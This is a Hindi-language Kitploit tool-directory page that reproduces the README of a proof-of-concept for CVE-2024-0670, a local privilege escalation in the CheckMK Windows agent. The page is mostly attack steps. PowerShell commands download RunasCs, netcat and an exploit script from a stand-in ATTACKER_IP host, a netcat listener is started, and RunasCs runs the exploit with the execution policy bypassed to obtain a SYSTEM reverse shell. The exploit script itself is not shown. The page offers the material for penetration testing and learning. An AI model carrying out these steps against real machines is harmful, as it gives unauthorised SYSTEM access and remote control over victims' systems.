Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-0670-CheckMK-Agent-Local-Privilege-Escalation-Exploit — यह रिपॉज़िटरी CVE-2024-0670 के लिए एक एक्सप्लॉइट प्रदर्शन प्रस्तुत करती है, जो Windows के लिए CheckMK Agent को प्रभावित करने वाली एक स्थानीय विशेषाधिकार वृद्धि (local privilege escalation) भेद्यता है। यह भेद्यता एक निम्न-विशेषाधिकार प्राप्त उपयोगकर्ता को MSI मरम्मत तंत्र द्वारा संसाधित लिखने योग्य फ़ाइल पथों का दुरुपयोग करके SYSTEM विशेषाधिकार प्राप्त करने की अनुमति देती है। | Kitploit
उपकरण/GitHubGitHub/elsevar11/cve-2024-0670-checkmk-agent-local-privilege-escalation-exploit
विशेषाधिकार वृद्धिपेलोड जनरेशनभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षाबाइनरी शोषण
GitHubelsevar11/cve-2024-0670-checkmk-agent-local-privilege-escalation-exploit

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

यह रिपॉज़िटरी CVE-2024-0670 के लिए एक एक्सप्लॉइट प्रदर्शन प्रस्तुत करती है, जो Windows के लिए CheckMK Agent को प्रभावित करने वाली एक स्थानीय विशेषाधिकार वृद्धि (local privilege escalation) भेद्यता है। यह भेद्यता एक निम्न-विशेषाधिकार प्राप्त उपयोगकर्ता को MSI मरम्मत तंत्र द्वारा संसाधित लिखने योग्य फ़ाइल पथों का दुरुपयोग करके SYSTEM विशेषाधिकार प्राप्त करने की अनुमति देती है।

CVE-2024-0670-CheckMK-Agent-Local-Privilege-Escalation-Exploit

रिपॉजिटरी देखें
319 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2024-0670 – CheckMK एजेंट लोकल प्रिविलेज एस्केलेशन (PoC)

इस रिपॉजिटरी में CVE-2024-0670 के लिए एक सरल और स्वच्छ प्रूफ-ऑफ-कॉन्सेप्ट है, जो CheckMK विंडोज एजेंट में एक लोकल प्रिविलेज एस्केलेशन भेद्यता है। कम-विशेषाधिकार वाला उपयोगकर्ता MSI मरम्मत के दौरान निष्पादित लिखने योग्य अस्थायी फ़ाइल पथों का दुरुपयोग करके SYSTEM विशेषाधिकार प्राप्त कर सकता है।

🔍 भेद्यता सारांश

  • विक्रेता: Tribe29
  • CVE: CVE-2024-0670
  • परामर्श: https://sec-consult.com/vulnerability-lab/advisory/local-privilege-escalation-via-writable-files-in-checkmk-agent/

MSI मरम्मत के दौरान, CheckMK निम्नलिखित के अंतर्गत फ़ाइलें निष्पादित करता है:

root@kitploit:~
  C:\Windows\Temp\

यदि कोई सामान्य उपयोगकर्ता अनुमानित नामों के साथ वहां फ़ाइलें रख सकता है, तो वे NT AUTHORITY\SYSTEM के रूप में कमांड निष्पादित कर सकते हैं।

यह एक्सप्लॉइट कई पेलोड फ़ाइलनाम सीड करता है और SYSTEM निष्पादन प्राप्त करने के लिए MSI मरम्मत को ट्रिगर करता है।

📂 फ़ाइलें

root@kitploit:~
RunasCs.exe     → runas रिप्लेसमेंट (प्लेनटेक्स्ट पासवर्ड सपोर्ट)
nc.exe          → Netcat (रिवर्स शेल)
exploit.ps1     → CVE-2024-0670 एक्सप्लॉइट स्क्रिप्ट
README.md       → दस्तावेज़ीकरण

🛠 आवश्यकताएँ

  • कम-विशेषाधिकार वाला Windows उपयोगकर्ता
  • PowerShell सक्षम
  • CheckMK Windows एजेंट स्थापित
  • फ़ाइलें डाउनलोड करने की क्षमता
  • Python (सरल HTTP सर्वर के लिए)
  • हमलावर मशीन पर Netcat लिसनर

📡 HTTP सर्वर प्रारंभ करें

root@kitploit:~
  C:\Windows\Temp\

📥 टारगेट पर टूल डाउनलोड करें

root@kitploit:~
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/RunasCs.exe" -OutFile "C:\Windows\Temp\RunasCs.exe"
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/nc.exe" -OutFile "C:\Windows\Temp\nc.exe"
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/exploit.ps1" -OutFile "C:\Windows\Temp\exploit.ps1

🚀 एक्सप्लॉइट चलाना

अपनी मशीन पर एक लिसनर प्रारंभ करें:

root@kitploit:~
nc -lvnp 1111
root@kitploit:~
.\RunasCs.exe username "password" "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Windows\Temp\exploit.ps1"

सफल होने पर, आपको एक SYSTEM रिवर्स शेल प्राप्त होगा।

🔧 RunasCs मैन्युअली बनाएं (वैकल्पिक)

root@kitploit:~
net4: 
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe -target:exe -optimize -out:RunasCs.exe RunasCs.cs 

net2: 
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe -target:exe -optimize -out:RunasCs_net2.exe RunasCs.cs

⚖️ कानूनी अस्वीकरण

यह प्रोजेक्ट केवल शैक्षिक और अधिकृत पेनेट्रेशन टेस्टिंग के लिए है। इसे अवैध उद्देश्यों के लिए उपयोग न करें। लेखक दुरुपयोग के लिए ज़िम्मेदार नहीं है।

टूल डाउनलोड करें